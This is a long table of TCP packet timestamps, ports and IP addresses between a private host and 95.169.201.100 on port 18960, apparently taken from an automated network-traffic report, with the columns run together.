                                                                                                                                                      Dec 4, 2024 13:58:11.575294018 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.575469017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.576332092 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.576380014 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.576432943 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.577172041 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.577207088 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.577274084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.578181982 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.578260899 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.578285933 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.579291105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.579324007 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.579423904 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.580218077 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.580262899 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.649760008 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.649935961 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.649986029 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.650140047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.650233984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.650274038 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.650605917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.650695086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.650747061 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.651392937 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.651484966 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.651523113 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.652278900 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.652383089 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.652445078 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.652997017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.653134108 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.653187037 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.653754950 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.653893948 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.654364109 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.654548883 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.654664040 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.654702902 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.655411005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.655611038 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.656160116 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.656260014 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.656974077 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.657075882 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.657897949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.657985926 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.658626080 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.658699989 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.659054041 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.659365892 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.659461021 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.659518957 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.660151005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.660271883 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.660473108 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.660988092 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.661115885 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.661158085 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.661766052 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.661906004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.661956072 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.662565947 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.662699938 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.662740946 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.663357973 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.663491964 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.663531065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.664164066 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.664280891 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.664324045 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.664946079 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.665086031 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.665137053 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.665764093 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.665870905 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.665918112 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.666652918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.666780949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.667100906 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.667612076 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.667810917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.667865038 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.668382883 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.668555975 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.668596983 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.669164896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.669326067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.669909000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.669948101 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.670078993 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.670713902 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.670753956 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.670825005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.670865059 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.671396017 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.671519041 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.672218084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.672267914 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.672329903 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.672950983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.673003912 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.760484934 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.760637045 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.760679960 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.760749102 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.760919094 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.761151075 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.761569977 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.761677980 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.761715889 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.762484074 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.762651920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.762686014 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.763243914 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.763350964 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.763576031 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.763999939 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.764183998 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.764219999 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.764772892 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.764866114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.764938116 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.765578985 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.765686035 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.765733957 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.766386986 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.766469955 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.766509056 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.767227888 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.767344952 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.767455101 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.768081903 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.768307924 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.768404961 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.768821001 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.768907070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.768940926 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.769541979 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.769619942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.769661903 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.770397902 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.770550966 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.770587921 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.771271944 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.771378040 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.771414042 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.771970034 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.772151947 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.772280931 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.772914886 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.773116112 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.773155928 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.773571014 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.773957014 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.774379015 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.774399996 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.774590969 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.774636030 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.775250912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.775441885 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.775882959 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.775953054 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.776123047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.776164055 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.776793957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.776897907 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.776932955 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.777693987 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.777777910 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.777821064 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.778345108 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.786864996 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.842823982 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.842859983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.842904091 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.843070030 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.843252897 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.843668938 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.843743086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.843828917 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.843868971 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.844424963 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.844605923 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.844676018 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.845341921 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.845499992 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.845536947 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.846177101 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.846272945 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.846309900 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.846889019 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.846993923 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.847135067 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.847702026 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.847856998 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.847913980 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.848592043 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.848673105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.848722935 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.849359989 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.849427938 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.849467039 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.850132942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.850231886 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.850337029 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.850737095 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.850850105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.851492882 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.851596117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.851692915 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.851867914 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.852472067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.852613926 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.852649927 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.853504896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.853669882 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.853730917 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.854770899 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.854875088 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.854912043 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.855585098 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.855736971 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.855876923 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.856266022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.856473923 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.856513023 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.857127905 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.857270002 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.857310057 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.857953072 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.858082056 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.858119011 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.858725071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.858814001 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.858850002 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.859354973 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.859442949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.859483957 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.860140085 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.860222101 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.860271931 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.861027002 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.861165047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.861212015 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.861934900 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.862016916 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.862087011 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.862649918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.862718105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.862752914 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.863447905 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.863574028 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.863610983 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.864166021 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.864381075 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.864413023 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.865000010 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.865101099 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.865875959 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.865941048 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.865951061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.866933107 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.866946936 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.952883959 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.952903986 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.952949047 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.952997923 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.953115940 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.953146935 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.953830957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.954106092 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.954145908 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.954291105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.954989910 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.955024004 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.955085039 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.955780983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.955822945 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.955913067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.956547022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.956581116 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.956676006 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.957565069 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.957602024 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.957679033 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.958343983 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.958383083 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.958446026 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.959162951 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.959204912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.959218025 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.959959030 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.959990978 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.960056067 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.960643053 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.960683107 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.960798979 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.961345911 CET189604973295.169.201.100192.168.2.4
